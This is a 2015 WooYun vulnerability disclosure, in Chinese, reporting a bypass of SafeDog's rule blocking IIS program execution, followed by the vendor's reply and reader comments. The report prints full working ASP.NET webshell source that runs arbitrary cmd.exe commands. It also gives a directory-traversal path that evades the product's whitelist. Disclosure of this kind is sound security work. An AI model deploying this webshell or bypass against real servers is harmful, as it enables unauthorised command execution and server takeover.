当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101461

漏洞标题:网站安全狗禁止IIS执行程序bypass

相关厂商:安全狗

漏洞作者: RedFree

提交时间:2015-03-15 12:57

修复时间:2015-06-18 12:59

公开时间:2015-06-18 12:59

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-15: 细节已通知厂商并且等待厂商处理中
2015-03-20: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-14: 细节向核心白帽子及相关领域专家公开
2015-05-24: 细节向普通白帽子公开
2015-06-03: 细节向实习白帽子公开
2015-06-18: 细节向公众公开

简要描述:

安全狗拦截了通过webshell来运行程序,那么提权怎么破?没关系,下面的打狗方法一定满足你的要求。

详细说明:

从Aspxspy中提取执行cmd命令的代码如下:

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<script Language="c#" runat="server">
protected void FbhN(object sender,EventArgs e)
{
try
{
Process ahAE=new Process();
ahAE.StartInfo.FileName=kusi.Value;
ahAE.StartInfo.Arguments=bkcm.Value;
ahAE.StartInfo.UseShellExecute=false;
ahAE.StartInfo.RedirectStandardInput=true;
ahAE.StartInfo.RedirectStandardOutput=true;
ahAE.StartInfo.RedirectStandardError=true;
ahAE.Start();
string Uoc=ahAE.StandardOutput.ReadToEnd();
Uoc=Uoc.Replace("<","&lt;");
Uoc=Uoc.Replace(">","&gt;");
Uoc=Uoc.Replace("\r\n","<br>");
tnQRF.Visible=true;
tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
}
catch(Exception error)
{
Response.Write(error.Message);
}
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<div runat="server" id="vIac">
<p>路径:<br/>
<input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
</p>
参数:<br/>
<input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
<div id="tnQRF" runat="server" visible="false" enableviewstate="false">
</div>
</div>
</form>
</body>
</HTML>


尝试执行命令:

1.jpg


结果:拒绝访问
看一下安全狗的日志:

2.jpg


执行的命令被拦截。
再回去看一下安全狗的白名单:

3.jpg


突然想到了一个方法,利用目录跳转来绕过白名单策略。
构造如下路径:

C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\csc.exe\..\..\..\..\system32\cmd.exe


再去测试一下:

4.jpg


完美绕过安全狗的防御!
更多方法等你来发现哦!

漏洞证明:

4.jpg

修复方案:

白名单不能这么检验吧!

版权声明:转载请注明来源 RedFree@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-18 12:59

厂商回复:

最新状态:

2015-05-22:不好意思. 之前漏了. 这个漏洞3.5正式版已经修复. 感谢关注.


漏洞评价:

评论

  1. 2015-03-15 12:58 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    前排

  2. 2015-03-15 13:21 | ch1st ( 路人 | Rank:6 漏洞数:4 | 虽然人们已经忘记我的存在,但是我还在默默...)

    后炮

  3. 2015-03-15 13:27 | by小小 ( 路人 | Rank:4 漏洞数:2 | 一个无聊的人)

    发了以后可能就真没了呀 何必呢

  4. 2015-03-15 13:55 | 崔超杰 ( 普通白帽子 | Rank:192 漏洞数:53 | 知仙)

    这货增加渗透难度

  5. 2015-03-15 13:58 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    eq二连闪现r过去就几巴掌!

  6. 2015-03-25 00:00 | sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)

    无影响厂商忽略.....